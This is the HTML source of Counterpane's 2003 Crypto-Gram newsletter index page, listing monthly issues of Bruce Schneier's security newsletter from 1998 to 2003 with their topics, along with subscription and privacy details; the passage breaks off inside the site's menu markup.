	>           <tr height="4" bgcolor="#CCCCCC">
	>             <td colspan="8"><img src="images/clear.gif" alt="" width="92" height="4"></td>
	>             <td width="25"><img src="images/clear.gif" alt="" width="25" height="4"></td>
	>             <td><img src="images/clear.gif" alt="" width="1" height="4"></td>
	>           <td width="100%" bgcolor="#FFFFFF" background="images/angle_bottom.gif"><img src="images/clear.gif" alt="" width="1" height="4"></td>
	>           </tr>
	>
	>       </table>
	>  </td>
	>   </tr>
	>
	> </table>
	>
	> <!-- end top navigation -->
	>
	>
	>
	> <!---- global table ------------------------->
	> <table cellpadding="0" cellspacing="0" border="0" width="558">
	>
	>   <tr>
	>
	>     <!-------------- left column ---------------------------------------------------->
	>
	>     <td valign="top" width="146" bgcolor="#CCCCCC">
	> 
	>    <!---- highlights ------------------------->
	>    <img src="images/topleft_whatsnew.gif" alt="What's New" border="0" width="146" height="18"><br>
	>   
	>    <table cellpadding="0" cellspacing="0" border="0" width="146">
	>     <tr>
	>     <td><img src="images/clear.gif" alt="" border="0" width="6" height="1"></td>
	>     <td><table cellpadding="0" cellspacing="0" border="0" width="134">
	>      <tr>
	>        <td><img src="images/clear.gif" alt="" border="0" width="1" height="10"></td></tr>
	>
	> <!--ignore_perlfect_search-->
	> <!-- begin highlights -->
	>
	>
	> <tr><td class="leftcol"><a href="pr-20030825.html">Counterpane Delivers Industry's Most Comprehensive Managed Security Services</a></td></tr>
	>
	> <tr><td><img src="images/clear.gif" alt="" border="0" width="1" height="14"></td></tr>
	>
	> <tr><td class="leftcol"><a href="alerts.html">Security Alerts: Nachi Worm, New SoBig Variant</a></td></tr>
	>
	> <tr><td><img src="images/clear.gif" alt="" border="0" width="1" height="14"></td></tr>
	>
	> <tr><td class="leftcol"><a href="pr-20030813.html">Paul Stich Assumes Role of President and CEO</a></td></tr>
	>
	> <tr><td><img src="images/clear.gif" alt="" border="0" width="1" height="14"></td></tr>
	>
	> <tr><td class="leftcol"><a href="pr-20030715.html">Counterpane Announces Record Second Quarter Results</a></td></tr>
	>
	> <tr><td><img src="images/clear.gif" alt="" border="0" width="1" height="14"></td></tr>
	>
	> <tr><td class="leftcol"><a href="pr-20030625.html">Bruce Schneier Testifies at Hearing of Homeland Security Subcommittee</a></td></tr>
	>
	> <tr><td><img src="images/clear.gif" alt="" border="0" width="1" height="14"></td></tr>
	>
	> <tr><td class="leftcol"><a href="pr-sclifetime.html">Secure Computing Magazine Honors Bruce Schneier with Lifetime Achievement Award</a></td></tr>
	>
	> <tr><td><img src="images/clear.gif" alt="" border="0" width="1" height="14"></td></tr>
	>
	> <tr><td class="leftcol"><a href="pr-hs.html">Counterpane Strengthens Executive Team with the Additions of Doug Howard and Kevin Senator</a></td></tr>
	>
	> <tr><td><img src="images/clear.gif" alt="" border="0" width="1" height="14"></td></tr>
	>
	>
	>
	>
	>
	>
	>
	>
	>
	>
	>
	>
	>
	> <!-- end highlights -->
	> <!--/ignore_perlfect_search-->
	>
	>      <tr><td><img src="images/clear.gif" alt="" border="0" width="1" height="14"></td></tr>    
	>     </table>
	>    </td>
	>   </tr>
	>  </table>
	> 
	>
	>
	> <!---- search form ------------------------->
	>  <table cellpadding="0" cellspacing="0" border="0" width="146">
	>   <tr><td colspan=2><img src="images/dottedline.gif" alt="" border="0" width="146" height="1"></td></tr>
	>   <tr><td colspan=2><img src="images/search_header.gif" alt="Search" border="0" width=38 height=16 hspace="5"></td></tr>
	>   <tr><td colspan=2><img src="images/dottedline.gif" alt="" border="0" width="146" height="1"></td></tr>
	>   <tr><td colspan=2><img src="images/clear.gif" alt="" border="0" width="1" height="10"></td></tr>
	>  <tr valign=middle><form name="searchForm" action="/search/search.pl"><td align=left class="black-text" valign=top>
	>      <!-- conditional sizing of search field, based on browser -->
	>               <script language="JavaScript" type="text/javascript">
	>      <!--
	>      if(ns4 && !mac) {document.writeln('<input type="text" class="black-text" size="8" name="q">');}
	>      else if (ns4 && mac) {document.writeln('<input type="text" size="11" class="black-text" name="q" onFocus="scrollTo(0,0)">');} 
	>      else if (ie4 && mac) {document.writeln('<input type="text" size="15" name="q">');}
	>      else {document.writeln('<input type="text" size="16" class="black-text" name="q">');}
	>      //-->
	>      </script>
	>      <noscript><input type="text" size="8" class="black-text" name="q"></noscript>
	>
	> 
	>  </td><td><input WIDTH=24 HEIGHT=15 type="image" name="q" src="images/search_button2.gif" alt="GO" hspace=2 border="0"></td></form></tr></table>
	>
	>
	>
	> <!------- end of left column------------------->
	> </td>
	>
	> <!---spacer----><td width="8"><img src="images/clear.gif" alt="" border="0" width="8" height="1"><br></td>
	>
	>  <!-------------- middle column ------------------------------------------------------->
	>  <td valign="top" width="404">
	>    <table cellpadding="0" cellspacing="0" border="0" width="404">
	>    <tr>
	>      <td><img src="images/header_crypto.gif" alt="Crypto-Gram Newsletter" border="0" width=199 height=14></td>
	>    </tr>
	>    <tr><td bgcolor="#cccccc"><img src="images/clear.gif" alt="" border="0" width="404" height="1"></td></tr>
	>    </table>
	>      <table cellpadding="0" cellspacing="0" border="0" width="404">
	>           <tr>
	>       <td valign="bottom" align="left"> <!---- title ------------------------->
	>               <table cellpadding="0" cellspacing="0" border="0" width="403">
	>                 <tr>
	>                   <td width="393" align="left" valign="top">
	>                     <p><img src="images/clear.gif" alt="" border="0" width="1" height="10"></p>
	>
	>               <table width="393" border="0" cellspacing="0" cellpadding="4">
	>
	>
	> <TR><TD colspan=2>
	> <P class="black-text">Crypto-Gram is a <STRONG>free</STRONG> monthly e-mail newsletter on computer security and cryptography from
	> <a href="schneier.html">Bruce Schneier</a>
	> (author of <a href="sandl.html">Secrets and Lies</a> and <a href="applied.html">Applied Cryptography</a>, inventor of <a href="blowfish.html">Blowfish</a>
	> and <a href="twofish.html">Twofish</a>,
	> CTO and founder of <a href="/">Counterpane Internet Security, Inc.</a>,
	> general <a href="pitfalls.html">crypto pundit</a>
	> and occasional
	> <a href="whycrypto.html">crypto curmudgeon</a>).
	>
	> <P class="black-text"><STRONG class="black-bold-text">Subscriptions</STRONG>
	> <BR>To subscribe to the list, send e-mail to <a href="mailto:crypto-gram-subscribe@...parraltree.com">our subscription address</a> from the address you wish to subscribe.  You will receive a confirmation message; reply to that message to finalize your subscription.
	>
	> <P class="black-text"><a href="http://www.counterpane.com/unsubform.html">More details on subscribing and unsubscribing</a>
	>
	> <P class="black-text">Our <a href="#privacy">privacy statement</a> is below.
	>
	> <P class="black-text"><STRONG class="black-bold-text">Issues</STRONG>
	> </TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0308.html">15 Aug 2003</a></TH>
	> <TD class="black-text">Beyond Fear, flying on someone else's plane ticket, hidden text in computer documents</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0307.html">15 Jul 2003</a></TH>
	> <TD class="black-text">How to fight, more e-mail filtering idiocy, Password Safe, crying wolf</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0306.html">15 Jun 2003</a></TH>
	> <TD class="black-text">Cyber-terrorism, self-destructing DVDs, attacking virtual machines, auditable tasers</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0305.html">15 May 2003</a></TH>
	> <TD class="black-text">Encryption and wiretapping, receipts, unique e-mail addresses and spam</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0304.html">15 Apr 2003</a></TH>
	> <TD class="black-text">Postal denial-of-service, baseball, NCIC database accuracy</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0303.html">15 Mar 2003</a></TH>
	> <TD class="black-text">Practical Cryptography, SSL flaw, SSL patent case, woodland ants</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0302.html">15 Feb 2003</a></TH>
	> <TD class="black-text">Locks and full disclosure, SQL Slammer, importance of authentication</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0301.html">15 Jan 2003</a></TH>
	> <TD class="black-text">Militaries and cyber-war, cichlid fish, RMAC authentication mode</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0212.html">15 Dec 2002</a></TH>
	> <TD class="black-text">Counterattack, Department of Homeland Security, Dan Cooper, crime</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0211.html">15 Nov 2002</a></TH>
	> <TD class="black-text">New book, Japanese honeybees, choose your own Doghouse candidate</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0210.html">15 Oct 2002</a></TH>
	> <TD class="black-text">National Strategy to Secure Cyberspace, more on AES cryptanalysis, one-time pads</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0209.html">15 Sep 2002</a></TH>
	> <TD class="black-text">Word 97 vulnerability, AES news, Reveal, The Odyssey</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0208.html">15 Aug 2002</a></TH>
	> <TD class="black-text">Palladium and the TCPA, license to hack, arming airline pilots</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0207.html">15 Jul 2002</a></TH>
	> <TD class="black-text">Embedded control systems and security, Perrun virus</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0206.html">15 Jun 2002</a></TH>
	> <TD class="black-text">Fixing intelligence failures, more on secrecy and security</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0205.html">15 May 2002</a></TH>
	> <TD class="black-text">Secrecy, security, and obscurity; fun with fingerprint readers</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0204.html">15 Apr 2002</a></TH>
	> <TD class="black-text">How to think about security, liability and security, key length</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0203.html">15 Mar 2002</a></TH>
	> <TD class="black-text">SNMP, IETF &quot;Responsible Disclosure&quot; document, Bernstein's factoring paper</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0202.html">15 Feb 2002</a></TH>
	> <TD class="black-text">Judging Microsoft, Oracle's &quot;unbreakable&quot; database</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0201.html">15 Jan 2002</a></TH>
	> <TD class="black-text">Windows UPnP vulnerability, Password Safe 2.0, AGS Encryptions</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0112.html">15 Dec 2001</a></TH>
	> <TD class="black-text">National ID cards, judges punish bad security, fun with vulnerability scanners</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0111.html">15 Nov 2001</a></TH>
	> <TD class="black-text">Full disclosure, GOVNET, Password Safe vulnerability, Windows XP</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0110.html">15 Oct 2001</a></TH>
	> <TD class="black-text">Cyberterrorism and cyberhooliganism, war on terrorism, SSSCA, Nimda, port 80</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0109a.html">30&nbsp;Sep&nbsp;2001</a></TH>
	> <TD class="black-text">Special issue on the Sep. 11 terrorist attacks and their aftermath
	> <BR><a href="http://zeusnews.com/index.php3?ar=stampa&cod=838&ar2=stampa&numero=999">Italian translation by Paolo Attivissimo</a></TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0109.html">15&nbsp;Sep&nbsp;2001</a></TH>
	> <TD class="black-text">11 September 2001, NSA's dual counter mode, Microsoft root certificate program</TD></TR>
	> <TR valign=top>
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0108.html">15&nbsp;Aug&nbsp;2001</a></TH>
	> <TD class="black-text">DMCA, Code Red, copyright protection, cybercrime treaty</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0107.html">15&nbsp;Jul&nbsp;2001</a></TH>
	> <TD class="black-text">Phone hacking: the next generation, monitoring first</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0106.html">15&nbsp;Jun&nbsp;2001</a></TH>
	> <TD class="black-text">Honeypots and Honeynet, Invicta Networks, DDOS attacks on grc.com</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0105.html">15&nbsp;May&nbsp;2001</a></TH>
	> <TD class="black-text">Military history, digital copy prevention, security standards, safe personal computing</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0104.html">15&nbsp;Apr&nbsp;2001</a></TH>
	> <TD class="black-text">Advantages of defense, CSI computer crime survey, fake Microsoft certificates</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0103.html">15&nbsp;Mar&nbsp;2001</a></TH>
	> <TD class="black-text">The security patch treadmill, insurance, death of IDS, 802.11 security</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0102.html">15&nbsp;Feb&nbsp;2001</a></TH>
	> <TD class="black-text">CPRM, an intentional backdoor, e-mail filter idiocy, air gaps, internet voting</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0101.html">15&nbsp;Jan&nbsp;2001</a></TH>
	> <TD class="black-text">A cyber UL?, SafeMessage, social engineering, code signing in Windows</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0012.html">15&nbsp;Dec&nbsp;2000</a></TH>
	> <TD class="black-text">Voting and technology, digital safe-deposit boxes, new bank privacy regs</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0011.html">15&nbsp;Nov&nbsp;2000</a></TH>
	> <TD class="black-text">Digital signatures, SDMI hacking challenge, Microsoft hack</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0010.html">15&nbsp;Oct&nbsp;2000</a></TH>
	> <TD class="black-text">Semantic attacks, cybercrime treaty, NSA on security, AES announced</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0009.html">15&nbsp;Sep&nbsp;2000</a></TH>
	> <TD class="black-text">Full disclosure, Carnivore, FBI and the Olympics, Facemail, PGP vulnerability</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0008.html">15&nbsp;Aug&nbsp;2000</a></TH>
	> <TD class="black-text">Secrets and Lies, &quot;Crime in Cyberspace&quot; convention, Authentica, Bluetooth</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0007.html">15&nbsp;Jul&nbsp;2000</a></TH>
	> <TD class="black-text">Full disclosure and the CIA, presidential password, lockmaking, Unicode</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0006.html">15&nbsp;Jun&nbsp;2000</a></TH>
	> <TD class="black-text">SOAP, Java and viruses, DES, Infraworks</TD></TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0005.html">15&nbsp;May&nbsp;2000</a></TH>
	> <TD class="black-text">Microsoft vs. Slashdot, Cybercrime treaty, Trusted client software, ILOVEYOU</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0004.html">15&nbsp;Apr&nbsp;2000</a></TH>
	> <TD class="black-text">AES conference, French banking card hack, Microsoft Active Setup, UCITA</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0003.html">15&nbsp;Mar&nbsp;2000</a></TH>
	> <TD class="black-text">Kerberos and Win2K, software burglary tools, UCITA, software complexity</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0002.html">15&nbsp;Feb&nbsp;2000</a></TH>
	> <TD class="black-text">Distributed denial-of-service, Chinese crypto regs, publicizing vulnerabilities</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-0001.html">15&nbsp;Jan&nbsp;2000</a></TH>
	> <TD class="black-text">Publicity attacks, new encryption regs, Netscape, block and stream ciphers</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9912.html">15&nbsp;Dec&nbsp;1999</a></TH>
	> <TD class="black-text">Security as process, ECHELON, export regulations draft, GSM encryption</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9911.html">15&nbsp;Nov&nbsp;1999</a></TH>
	> <TD class="black-text">Why computers are insecure, DVD encryption, Win CE, Elliptic Curves</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9910.html">15&nbsp;Oct&nbsp;1999</a></TH>
	> <TD class="black-text">Becoming a cryptographer, export rules, AMD, PKI slogans, key length</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9909.html">15&nbsp;Sep&nbsp;1999</a></TH>
	> <TD class="black-text">Open source, NSAKEY, CESA, E*Trade, factoring RSA</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9908.html">15&nbsp;Aug&nbsp;1999</a></TH>
	> <TD class="black-text">Back Orifice 2000, AES news, HPUX, web-based encrypted mail</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9907.html">15&nbsp;Jul&nbsp;1999</a></TH>
	> <TD class="black-text">Future of crypto-hacking, bungled SSL, reader comments</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9906.html">15&nbsp;Jun&nbsp;1999</a></TH>
	> <TD class="black-text">E-mail viruses, hacking archives, international encryption policy</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9905.html">15&nbsp;May&nbsp;1999</a></TH>
	> <TD class="black-text">Internationalization of cryptography, export rules, TWINKLE</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9904.html">15&nbsp;Apr&nbsp;1999</a></TH>
	> <TD class="black-text">The importance of not being different, smart card threats, attacking certificates with viruses</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9903.html">15&nbsp;Mar&nbsp;1999</a></TH>
	> <TD class="black-text">Security hole in IE/Outlook and Office, AES news, RSA-140 factored</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9902.html">15&nbsp;Feb&nbsp;1999</a></TH>
	> <TD class="black-text">Snake oil, NSA and crypto export, WinXFiles, back doors, Intel's processor ID</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9901.html">15&nbsp;Jan&nbsp;1999</a></TH>
	> <TD class="black-text">1998 year-in-review, clueless agents, Cayley-Purser</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9812.html">15&nbsp;Dec&nbsp;1998</a></TH>
	> <TD class="black-text">Cracking contests, recognizing plaintext, zip disks, Commerce Dept. committee</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9811.html">15&nbsp;Nov&nbsp;1998</a></TH>
	> <TD class="black-text">Electronic commerce, micro locks, copy protection, more on steganography</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9810.html">15&nbsp;Oct&nbsp;1998</a></TH>
	> <TD class="black-text">Steganography, TriStrata, Rapid Remote, memo to amateur cipher designers</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9809.html">15&nbsp;Sep&nbsp;1998</a></TH>
	> <TD class="black-text">Cramer-Shoup, impossible cryptanalysis, street performer, Private Doorbell</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9808.html">15&nbsp;Aug&nbsp;1998</a></TH>
	> <TD><P class="black-text">Hardware DES cracker, KEA, chosen protocol attack, biometrics</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9807.html">15&nbsp;Jul&nbsp;1998</a></TH>
	> <TD class="black-text">Breaking RSA, declassifying Skipjack, secure audit logs, WIPO</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9806.html">15&nbsp;Jun&nbsp;1998</a></TH>
	> <TD class="black-text">Side channel attacks, risks of key escrow, pseudo-random number generators</TD>
	> </TR>
	> <TR class="black-text">
	> <TH align=left valign=top class="black-bold-text"><a href="crypto-gram-9805.html">15&nbsp;May&nbsp;1998</a></TH>
	> <TD class="black-text">AES, secret story of non-secret encryption, conditional purchase orders</TD>
	> </TR>
	> <TR><TD colspan=2>
	>
	> <P class="black-text"><BR><STRONG class="black-bold-text"><a name="trans">Translations</a></STRONG>
	> <BR>Kript&oacute;polis translates Crypto-Gram into <a href="http://www.kriptopolis.com/index.php?id=C0_12_1">Spanish</a>.  <a href="http://www.communicationvalley.it/crypto-gram.html">Italian</a> translations, by Communication Valley S.P.A., are available on the web or as a mailing list.  Holger Hasselbach has translated several issues of Crypto-Gram into <a href="http://www.galad.com/extras/cg/cg.htm">German</a>, and Fernandes Gilbert has translated some issues into <a href="http://perso.wanadoo.fr/gilbert.fernandes/cryptogram.html">French</a>. 
	>
	> <P class="black-text"><STRONG class="black-bold-text"><a name="privacy">Privacy Statement</a></STRONG>
	> <BR>Counterpane Internet Security, Inc. and Counterpane Labs will not use the Crypto-Gram mailing list for any other purpose than e-mailing Crypto-Gram.  We will not use the mailing list for company marketing, nor will we sell the list to any third parties.
	>
	> </TD></TR>
	> </TABLE>
	>
	>
	>
	>
	>
	>
	>
	>                   </td>
	>                   <td width="10">&nbsp;</td>
	>                 </tr>
	>                 <!---- articles ------------------------->
	>               </table>
	>    <img src="images/clear.gif" alt="" border="0" width="1" height="21"><br>
	>               <a href="#" onclick="scrollTo(0,0)"><img src="images/back_to_top.gif" alt="TOP" border="0" width="27" height="9"></a></td>
	>   <td bgcolor="#cccccc"><img src="images/clear.gif" alt="" border="0" width="1" height="1"></td>
	>  </tr>
	>  </table>
	>  <table cellpadding="0" cellspacing="0" border="0" width="404">
	>   <tr><td bgcolor="#cccccc"><img src="images/clear.gif" alt="" border="0" width="404" height="1"></td></tr>
	>   <tr><td><img src="images/clear.gif" alt="" border="0" width="1" height="17"></td></tr>
	>   <tr><td bgcolor="#cccccc"><img src="images/clear.gif" alt="" border="0" width="404" height="1"></td></tr>
	>   <tr><td class="black-text">Copyright Counterpane Internet Security, Inc., 2003<BR>
	> <a href="permiss.html">Reprint Permission</a></td></tr>
	>   <tr><td><img src="images/clear.gif" alt="" border="0" width="1" height="50"></td></tr>
	>  </table>
	>
	> <!-------end of middle column------------------->
	> </td>
	>
	>   </tr>
	> </table>
	>
	> <!-------end of global table------------------->
	>
	>
	>
	>
	>
	>
	>
	> <!-- dropdown menus -->
	>
	> <div id="menuContact" onMouseOver="menuOn('menuContact')" onMouseOut="overChecker('menuContact')">
	> <script language="JavaScript">
	>  function onMouseOver() { menuOn('menuContact');}
	>  function onMouseOut() { overChecker('menuContact')}
	> </script>
	>   <a href="cis-contact.html" onmouseover="rollOn('contactnav_5_contact','menuContact')" onmouseout="rollOff('contactnav_5_contact','menuContact')"><img src="images/contactnav_5_contact.gif" alt="Contact" width=179 height=22 border="0" name="contactnav_5_contact"></a></div>
	>
	> <div id="menuSite" onMouseOver="menuOn('menuSite')" onMouseOut="overChecker('menuSite')">
	> <script language="JavaScript">
	>  function onMouseOver() { menuOn('menuSite');}
	>  function onMouseOut() { overChecker('menuSite')}
	> </script>
	>   <a href="index.html" onmouseover="rollOn('sitenav_r_home','menuSite')" onmouseout="rollOff('sitenav_r_home','menuSite')"><img src="images/sitenav_r_home.gif" alt="Home" width=179 height=18 border="0" name="sitenav_r_home"></a><br>
	>   <a href="sitemap.html" onmouseover="rollOn('sitenav_r_sitemap','menuSite')" onmouseout="rollOff('sitenav_r_sitemap','menuSite')"><img src="images/sitenav_r_sitemap.gif" alt="Site Map" width=179 height=18 border="0" name="sitenav_r_sitemap"></a><br>
	>   <a href="cissearch.html" onmouseover="rollOn('sitenav_r_search','menuSite')" onmouseout="rollOff('sitenav_r_search','menuSite')"><img src="images/sitenav_r_search.gif" alt="Search" width=179 height=18 border="0" name="sitenav_r_search"></a><br>
	>   <a href="https://www.counterpane.com/ccrp/" onmouseover="rollOn('sitenav_r_var','menuSite')" onmouseout="rollOff('sitenav_r_var','menuSite')"><img src="images/sitenav_r_var.gif" alt="VAR-only site" width=179 height=22 border="0" name="sitenav_r_var"></a></div>
	>
	> <div id="menuLibrary" onMouseOver="menuOn('menuLibrary')" onMouseOut="overChecker('menuLibrary')">
	> <script language="JavaScript">
	>  function onMouseOver() { menuOn('menuLibrary');}
	>  function onMouseOut() { overChecker('menuLibrary')}
	> </script>
	>   <a href="literature.html" onmouseover="rollOn('librarynav_2_literature','menuLibrary')" onmouseout="rollOff('librarynav_2_literature','menuLibrary')"><img src="images/librarynav_2_literature.gif" alt="Counterpane Literature" width=179 height=18 border="0" name="librarynav_2_literature"></a><br>
	>   <a href="log-analysis.html" onmouseover="rollOn('librarynav_2_log','menuLibrary')" onmouseout="rollOff('librarynav_2_log','menuLibrary')"><img src="images/librarynav_2_log.gif" alt="Log Analysis Resources" width=179 height=18 border="0" name="librarynav_2_log"></a><br>
	>   <a href="publish.html" onmouseover="rollOn('librarynav_2_labs','menuLibrary')" onmouseout="rollOff('librarynav_2_labs','menuLibrary')"><img src="images/librarynav_2_labs.gif" alt="Counterpane Labs Publications" width=179 height=18 border="0" name="librarynav_2_labs"></a><br>
	>   <a href="crypto-gram.html" onmouseover="rollOn('librarynav_r_crypto','menuLibrary')" onmouseout="rollOff('librarynav_r_crypto','menuLibrary')"><img src="images/librarynav_r_crypto.gif" alt="Crypto-Gram" width=179 height=18 border="0" name="librarynav_r_crypto"></a><br>
	>   <a href="book-beyondfear.html" onmouseover="rollOn('librarynav_4_beyond_fear','menuLibrary')" onmouseout="rollOff('librarynav_4_beyond_fear','menuLibrary')"><img src="images/librarynav_4_beyond_fear.gif" alt="Beyond Fear" width=179 height=18 border="0" name="librarynav_4_beyond_fear"></a><br>
	>   <a href="sandl.html" onmouseover="rollOn('librarynav_r_sandl','menuLibrary')" onmouseout="rollOff('librarynav_r_sandl','menuLibrary')"><img src="images/librarynav_r_sandl.gif" alt="Secrets and Lies" width=179 height=22 border="0" name="librarynav_r_sandl"></a>
	>   </div>
	>  
	> <div id="menuNews" onMouseOver="menuOn('menuNews')" onMouseOut="overChecker('menuNews')">
	> <script language="JavaScript">
	>  function onMouseOver() { menuOn('menuNews');}
	>  function onMouseOut() { overChecker('menuNews')}
	> </script>
	>   <a href="cisnews.html" onmouseover="rollOn('newsnav_2_clip','menuNews')" onmouseout="rollOff('newsnav_2_clip','menuNews')"><img src="images/newsnav_2_clip.gif" alt="Press Clippings" width=179 height=18 border="0" name="newsnav_2_clip"></a><br>
	>   <a href="pressrel.html" onmouseover="rollOn('newsnav_2_release','menuNews')" onmouseout="rollOff('newsnav_2_release','menuNews')"><img src="images/newsnav_2_release.gif" alt="Press Releases" width=179 height=18 border="0" name="newsnav_2_release"></a><br>
	>   <a href="analyst.html" onmouseover="rollOn('newsnav_2_analyst','menuNews')" onmouseout="rollOff('newsnav_2_analyst','menuNews')"><img src="images/newsnav_2_analyst.gif" alt="Analyst Comments" width=179 height=18 border="0" name="newsnav_2_analyst"></a><br> 
	>   <a href="alerts.html" onmouseover="rollOn('newsnav_2_alerts','menuNews')" onmouseout="rollOff('newsnav_2_alerts','menuNews')"><img src="images/newsnav_2_alerts.gif" alt="Alerts" width=179 height=18 border="0" name="newsnav_2_alerts"></a><br>
	>   <a href="conf.html" onmouseover="rollOn('newsnav_2_calendar','menuNews')" onmouseout="rollOff('newsnav_2_calendar','menuNews')"><img src="images/newsnav_2_calendar.gif" alt="Calendar" width=179 height=22 border="0" name="newsnav_2_calendar"></a></div>
	>
	> <div id="menuCustomers" onMouseOver="menuOn('menuCustomers')" onMouseOut="overChecker('menuCustomers')">
	> <script language="JavaScript">
	>  function onMouseOver() { menuOn('menuCustomers');}
	>  function onMouseOut() { overChecker('menuCustomers')}
	> </script>
	>   <a href="customers.html" onmouseover="rollOn('customersnav_5_customers','menuCustomers')" onmouseout="rollOff('newsnav_5_customers','menuCustomers')"><img src="images/customersnav_5_customers.gif" alt="Customers" width=179 height=22 border="0" name="customersnav_5_customers"></a></div>
	>
	> <div id="menuServices" onMouseOver="menuOn('menuServices')" onMouseOut="overChecker('menuServices')">
	> <script language="JavaScript">
